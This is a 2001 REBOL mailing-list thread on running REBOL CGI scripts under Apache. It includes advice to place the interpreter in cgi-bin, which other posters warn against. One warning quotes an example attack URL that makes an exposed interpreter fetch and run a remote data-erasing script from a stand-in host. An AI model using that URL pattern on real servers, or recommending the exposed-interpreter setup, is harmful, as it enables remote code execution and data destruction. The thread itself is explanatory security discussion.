APACHE + REBOL as CGI?
[1/27] from: carlos:lorenz at: 30-Jul-2001 12:17
Hi friends,
I´m trying to run some CGI in REBOL on the server but have no success.
According to the support team (that loves PERL) their machines (running
APACHE) are not configured to support REBOL as CGI.
My question is: is really necessary to configure APACHE to recognizes REBOL
scripts or can I just upload REBOL.EXE to a subdirectory under my space and
from there use it to run my scripts?
Carlos
[2/27] from: matt:blis at: 14-Sep-2001 16:31
Carlos Lorenz
<[carlos--lorenz--net]> wrote on 30/07/01 16:17:20:
>Hi friends,
>I´m trying to run some CGI in REBOL on the server but have no success.
<<quoted lines omitted: 3>>
>REBOL scripts or can I just upload REBOL.EXE to a subdirectory under
>my space and from there use it to run my scripts?
Hi Carlos.
I did this:
1. Put rebol executable in location like /usr/bin/rebol/
2. Initialise rebol network via telnet or editing the user.r file
3. create scripts with .cgi ending
4. Set shebang to #!/usr/bin/rebol/rebol --cgi
Worked like a charm, without needing to update any apache conf files.
I think apache has built in support for .cgi files.
Hope this is of some use.
Matt.
[3/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 10:29
I run REBOL on Apache all of the time without configuring Apache.
Put rebol executable in the /bin or /cgi-bin and chmod 755
all scripts should shebang to the rebol executable (e.g. #!rebol -cs)
make sure your scripts are set executable (e.g. chmod 755)
Also, use .cgi extensions on your scripts. This is key, since Apache is
probably set up to execute .cgi files, but NOT .r files.
-Ryan
"Carlos
Lorenz" To: <[rebol-list--rebol--com]>
<[carlos--lorenz] cc:
.net> Subject: [REBOL] APACHE + REBOL as CGI?
Sent by:
[rebol-bounce--r]
ebol.com
07/30/2001
10:47 AM
Please respond
to rebol-list
Hi friends,
I´m trying to run some CGI in REBOL on the server but have no success.
According to the support team (that loves PERL) their machines (running
APACHE) are not configured to support REBOL as CGI.
My question is: is really necessary to configure APACHE to recognizes REBOL
scripts or can I just upload REBOL.EXE to a subdirectory under my space and
from there use it to run my scripts?
Carlos
[4/27] from: tim:johnsons-web at: 14-Sep-2001 9:00
On Fri, Sep 14, 2001 at 10:29:32AM -0500, [ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
>
> Put rebol executable in the /bin or /cgi-bin and chmod 755
>
> all scripts should shebang to the rebol executable (e.g. #!rebol -cs)
>
> make sure your scripts are set executable (e.g. chmod 755)
>
> Also, use .cgi extensions on your scripts. This is key, since Apache is
> probably set up to execute .cgi files, but NOT .r files.
I run rebol apps as .r extensions on both my home linux machine and and
my domain (linux also). Not a problem that I've seen, but if anyone
has any comments on that process, I'd welcome an alternative opinion.
I strongly recomemnd against using the default cgi-bin directory.
I use "ScriptAlias".
Tim
> -Ryan
> "Carlos
<<quoted lines omitted: 28>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[5/27] from: ryanc:iesco-dms at: 14-Sep-2001 9:09
Ryan,
You should never ever put any type of interpeter in a directory accessable from the
internet with executable permissions. Security holes dont get any bigger than this.
--Ryan Cole
[ryan--christiansen--intellisol--com] wrote:
> I run REBOL on Apache all of the time without configuring Apache.
> Put rebol executable in the /bin or /cgi-bin and chmod 755
<<quoted lines omitted: 34>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Ryan Cole
Programmer Analyst
www.iesco-dms.com
707-468-5400
[6/27] from: matt:blis at: 14-Sep-2001 17:11
[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache.
>
>Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your
server, unless you're running on your local machine and firewalled up
to the teeth...
Matt
[7/27] from: ryan:christiansen:intellisol at: 14-Sep-2001 11:21
It never occurred to me before that this would be a problem. Now that I
think about it though.... whoah!
Good thoughts.
-Ryan
Matt Burns
<[matt--blis--co]. To: [rebol-list--rebol--com]
uk> cc:
Sent by: Subject: [REBOL] Re: APACHE + REBOL as CGI?
[rebol-bounce--r]
ebol.com
09/14/2001
11:11 AM
Please respond
to rebol-list
[ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
>I run REBOL on Apache all of the time without configuring Apache.
>
>Put rebol executable in the /bin or /cgi-bin and chmod 755
I wouldn't advise this, as it's gonna open up massive holes in your
server, unless you're running on your local machine and firewalled up
to the teeth...
Matt
[8/27] from: tim:johnsons-web at: 14-Sep-2001 9:21
On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
> >
<<quoted lines omitted: 4>>
> server, unless you're running on your local machine and firewalled up
> to the teeth...
I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up
to the teeth....
> Matt
>
> --
> To unsubscribe from this list, please send an email to
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[9/27] from: matt:blis at: 14-Sep-2001 17:32
Tim Johnson <[tim--johnsons-web--com]> wrote on 14/09/01 18:21:46:
>On Fri, Sep 14, 2001 at 05:11:50PM +0100, Matt Burns wrote:
>> [ryan--christiansen--intellisol--com] wrote on 14/09/01 16:29:32:
<<quoted lines omitted: 8>>
>I agree. I use symlink (ln) and ScriptAlias and I AM firewalled up
>to the teeth....
:-)
Matt.
[10/27] from: john:thousand-hills at: 14-Sep-2001 17:44
Give it a shot. I run Rebol that way on NT with Sambar.
With NT/IIS, I have to install the rebol.
I will be attempting to run scripts on Redhat 7.1 next week.
//john
At 12:17 PM 7/30/2001 -0300, you wrote:
[11/27] from: ryanc:iesco-dms at: 14-Sep-2001 17:16
I dont mean to preach, but just make very sure that it is not visible from the
web. Some like this with the proper url encoding could be deadly:
http://www.nosecurity.com/cgi-bin/rebol/rebol -cs --do "do
http://hacksters.com/eraseall.r"
--Ryan
john wrote:
> Give it a shot. I run Rebol that way on NT with Sambar.
> With NT/IIS, I have to install the rebol.
<<quoted lines omitted: 11>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Ryan Cole
Programmer Analyst
www.iesco-dms.com
707-468-5400
[12/27] from: john:thousand-hills at: 14-Sep-2001 19:40
I don't get it Ryan? Why would not having to "install" Rebol make a
security hole?
//john
At 05:16 PM 9/14/2001 -0700, you wrote:
[13/27] from: matt:blis at: 15-Sep-2001 11:14
> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
> On Behalf Of john
>
> I don't get it Ryan? Why would not having to "install" Rebol make a
> security hole?
As Ryan pointed out with his very astute example, placing the Rebol
binary in the cgi-bin does two things:
1) it allows your Rebol executable to be used in any url on your server
2) it allows *anyone* to do 1)
Due the the nature of Rebol being able to 'do remote scripts, someone
could quite easily write a script to send files/passwords/do system
commands on YOUR server.
This is Not A Good Thing(tm)
Matt.
[14/27] from: gchiu:compkarori at: 15-Sep-2001 23:51
> As Ryan pointed out with his very astute example, placing
> the Rebol
> binary in the cgi-bin does two things:
>
> 1) it allows your Rebol executable to be used in any url
> on your server
> 2) it allows *anyone* to do 1)
I would like to see a working example of this exploit. It
has been mentioned before, but has *anyone* actually got it
to do this??
--
Graham Chiu
[15/27] from: matt:blis at: 15-Sep-2001 12:38
> -----Original Message-----
> From: [rebol-bounce--rebol--com] [mailto:[rebol-bounce--rebol--com]]
<<quoted lines omitted: 13>>
> has been mentioned before, but has *anyone* actually got it
> to do this??
I doubt you will ever see this on any live server[1]! This is a very,
very well known security hazard, and is explained in more detail here
http://www.cert.org/advisories/CA-1996-11.html
HTH
Matt.
[1] that's been set up by someone that knows what they're doing.
[16/27] from: john:thousand-hills at: 15-Sep-2001 9:50
Let me ask again, what does this have to do with NOT INSTALLING Rebol?
I merely copied the files into a directory REBOL similar to the way I have
done PERL for years.
The only operating system that has demands for the setup of REBOL, or PERL
for that matter is NT4/IIS4 and 2000-Server/IIS5.. And I use all these OS
combination professionally and use PERL/REBOL now on all of them. I just
started using Rebol on Redhat 7.1 this week.
Otherwise NT/2000 with Sambar and Redhat is simply copy the files and use
them. The common thread, as I see it -is that IIS requires the setup to
work with PERL and REBOL..
Now if that makes me stupid or insecure -so be it, maybe your are just
brighter than the rest of us.
/john
At 12:38 PM 9/15/2001 +0100, you wrote:
[17/27] from: john:thousand-hills at: 15-Sep-2001 9:53
Matt:
First -you are assuming that not installing Rebol equates to placing it in
the CGI-BIN.
You made that assumption, I did not. I copied PERL into its own directory
for years, why would I place REBOL in the bin?
//john
At 11:14 AM 9/15/2001 +0100, you wrote:
[18/27] from: tim:johnsons-web at: 15-Sep-2001 17:58
Hi John:
I've noticed your questions and have time to just touch
briefly on it with what I know.
I personally don't know why one would have to be concerned about
the location of the binary. Doesn't sound to me like your doing
anything incorrect as far as Linux goes.....
I do not think it's a good idea to have the rebol binary in cgi-bin,
and it's really a good idea to have your own internal mapping so that
your not really using the standard cgi-bin. I'm referring to using
the ScriptAlias, which is in either access.conf or httpd.conf on
RH 7.0 (I think - just use RH 6.0 myself).
I'm sorry that I can't offer more than that, perhaps there will
be more on this after the weekend. HINT: Sometimes it helps
to repost under a different subject if you don't get the full
edification that you are looking for.
TIA
Tim
On Sat, Sep 15, 2001 at 09:50:17AM -0500, john wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
> I merely copied the files into a directory REBOL similar to the way I have
<<quoted lines omitted: 16>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[19/27] from: john:thousand-hills at: 15-Sep-2001 21:25
Thanks Tim.
I have Rebol running. In Linux each domain has its own CGI-BIN for the
scripts but the binaries and libraries reside in a directory accessed via
an alias. As with NT/SAMBAR I simply created the REBOL directories and
copied files, added " .r " to the cgi-bin as an accepted suffix attempting
to keep the directories identical to my other servers for platform
script/compatibility sake.
I say again -the only combination that I have experienced any trouble
running Rebol is NT/IIS combinations. The book covers little of what is
necessary to run rebol there and we fell upon it kind of by accident, but
have just recently set up 3 very active servers to run REBOL 0on top of
IIS-4 (one gets a Million hits a month).
Any way, NT/IIS is the only combination I see requiring formal
installation. And the setup required is identical to that of PERL. That
should help.
We will document the steps necessary and pass them on the REBOL and Book
authors.
John
At 05:58 PM 9/15/2001 -0800, you wrote:
[20/27] from: john:thousand-hills at: 15-Sep-2001 21:47
Tim:
I whole hearted suggest that you go to 7.1 Redhat. The difference is
overwhelming.
My installation takes up about 40Meg and the setup runs a real nice
selection of server components. Be liberal because in about 10 days (you
can change that) the system will set any unused services to a hot-standby
status freeing up the assets until they are needed.
It runs Rock Solid, now I am talking 7.1 not 7.0
John
At 05:58 PM 9/15/2001 -0800, you wrote:
[21/27] from: tim:johnsons-web at: 15-Sep-2001 20:10
On Sat, Sep 15, 2001 at 09:47:13PM -0500, john wrote:
> Tim:
I will be building a new machine in a month or so. I do expect to go
to something with the new Kernel..... I imagine I will chose either
RH 7.1 or SUSE...
> I whole hearted suggest that you go to 7.1 Redhat. The difference is
> overwhelming.
<<quoted lines omitted: 14>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[22/27] from: tim:johnsons-web at: 15-Sep-2001 20:13
On Sat, Sep 15, 2001 at 09:25:24PM -0500, john wrote:
> Thanks Tim.
> I have Rebol running. In Linux each domain has its own CGI-BIN for the
<<quoted lines omitted: 13>>
> We will document the steps necessary and pass them on the REBOL and Book
> authors.
Great! Pass them on to me too. I've got nothing on the internet with
that combination, but would like to be informed in case I have anything
requests to go on an NT server...
> John
> At 05:58 PM 9/15/2001 -0800, you wrote:
<<quoted lines omitted: 20>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
[23/27] from: john:thousand-hills at: 15-Sep-2001 22:31
Ok, I will document it all Monday and pass it by the LAN Administrator to
make sure I miss nothing.
He and I did all three (NT-4/IIS-4) servers together because the book was a
little weak. All three were equally difficult and identical in the resolution.
I was surp[rised because my Linux and Sambar servers were so auto-loaded by
copy/paste from the CD -I was not expecting a formal install
procedure. Thank God the CD had the files in a directory called "
/rebol/ "...
/john
At 08:13 PM 9/15/2001 -0800, you wrote:
[24/27] from: john:thousand-hills at: 15-Sep-2001 23:39
Tim:
You never know when you will need NT. The client sometimes demands the
standard
because they are afraid to be dependant of finding another
contractor with SAMBAR or LINUX knowledge.
This is the same problem I have with Rebol. Until I showed them things
were unable to accomplish before. When they realized that Rebol would free
them from the need for NT to run ASP, they jumped aboard.
The project that convinced them was the bus routes for the blind, not only
will it talk to them, it is dynamic, once any change hits the data base
-the next request displays it. It has saved me a well documented 8 man
weeks per year, and I draw a very high salary. They were impressed.
Even more than all that, the blind can SEE (or hear) the schedules -that
was a very high goal for me. And some of you guys helped me out.
John
At 08:13 PM 9/15/2001 -0800, you wrote:
[25/27] from: matt:blis at: 16-Sep-2001 14:28
John wrote:
> Let me ask again, what does this have to do with NOT INSTALLING Rebol?
Sorry, I quoted you as you were the last to reply, not in direct
response.
AFAIK this has nothing to so with whether you've installed Rebol or not.
As long as the executable is not directly available, you shouldn't have
too many problems in that area.
Sorry for the confusion! I'll mind the quotes next time!
Matt.
[26/27] from: john:thousand-hills at: 16-Sep-2001 23:28
Actually Matt, we go to great lengths to alias our access to the binaries.
I am a retired US Naval Officer -communications and Inteligence. My oldest
son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux
Enginere.
I have him run my systems for access holes, then patch it up according to
hes recommendations.
Having done that, i don't worry because I can't stop anybody smarter than
all that.
//john
At 02:28 PM 9/16/2001 +0100, you wrote:
[27/27] from: tim:johnsons-web at: 17-Sep-2001 8:40
On Sun, Sep 16, 2001 at 11:28:02PM -0500, john wrote:
> Actually Matt, we go to great lengths to alias our access to the binaries.
>
> I am a retired US Naval Officer -communications and Inteligence. My oldest
> son is in Air Force Intel. Computer Forensics and a Redhat Certified Linux
> Enginere.
This is sort of off-topic here, but I want to pose this question
(which IS apropo to these times) IMHO:
If so much interest is shown in hacking microsoft, sending viruses
in email, and general mischief (and some of it seems so well done),
why not "enlist" these hackers in disrupting, intercepting,
communications and money flow between terrorists.
On a slightly related note, I have an article written 1-Sep-2001
that might be of slight interest.
Disclaimer: My persona in this "webzine" is to be somewhat provocatinve,
somewhat tongue-in-check and rambling is permissable
BUT, having said that - I both plug rebol and talk about some
serious stuff that most of us haven't shown a lot of interest in,
but perhaps that has changed now.
http://www.frozen-north-linuxonline.com/
see "Tim's Bytes"
tj
> I have him run my systems for access holes, then patch it up according to
> hes recommendations.
<<quoted lines omitted: 25>>
> [rebol-request--rebol--com] with "unsubscribe" in the
> subject, without the quotes.
--
Tim Johnson <[tim--johnsons-web--com]>
http://www.johnsons-web.com
Notes
- Quoted lines have been omitted from some messages.
View the message alone to see the lines that have been omitted